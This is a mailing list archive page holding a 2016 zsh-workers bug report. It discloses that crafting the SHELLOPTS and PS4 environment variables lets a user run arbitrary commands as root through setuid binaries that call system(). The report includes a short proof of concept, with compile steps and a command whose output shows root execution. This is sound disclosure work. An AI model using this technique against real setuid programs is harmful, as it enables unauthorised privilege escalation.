Zsh Mailing List Archive Messages sorted by: Reverse Date, Date, Thread, Author

BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system

X-seq: zsh-workers 39456
From: Mateusz Lenik <mlen@xxxxxxx>
To: zsh-workers@xxxxxxx
Subject: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
Date: Tue, 27 Sep 2016 06:59:18 +0000
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=mlen.pl; s=google; h=mime-version:from:date:message-id:subject:to; bh=sUHJdvY7KXnnlQtV0VXpcn+U6oErt/rjmmiykfU/icc=; b=WaBp/5p2QjxTaSnsvdfYn21GP8xg9FlRbbD1xVmT68uY9am6mxNH3v4FuFwtHkvehM 26WcD3tFnoY3XwFATgxYXmi0B8ZChnaZu+9I4sTbSN8pSXApudmVp5KHqq02mYYt7OIy 8Z7nat4AZ5lE0PhHbUQ1n0EzkiklKV3K0/vpE=
List-help: <mailto:zsh-workers-help@zsh.org>
List-id: Zsh Workers List <zsh-workers.zsh.org>
List-post: <mailto:zsh-workers@zsh.org>
Mailing-list: contact zsh-workers-help@xxxxxxx; run by ezmlm

Hello everyone!

I just learned that bash fixed a vulnerability that also affects zsh. It
allowed to run arbitrary programs by crafting SHELLOPTS and PS4 variables
against setuid binaries using system/popen.

Steps to reproduce:
% gcc -xc - -otest <<< 'int main() { setuid(0); system("/bin/date"); }'
% sudo chown root:root test
% sudo chmod 4755 test
% env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=... groups=.../bin/date
Tue Sep 27 08:49:16 CEST 2016
% zsh --version

zsh 5.2 (x86_64-pc-linux-gnu)
%

The solution that bash folks implemented is to drop PS4 from env when the
shell is ran as root.

Best,
mlen

Follow-Ups:
- Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
  - From: Oliver Kiddle
- Re: BUG: crafting SHELLOPTS and PS4 allows to run arbitrary programs in setuid binaries using system
  - From: Daniel Shahaf

Messages sorted by: Reverse Date, Date, Thread, Author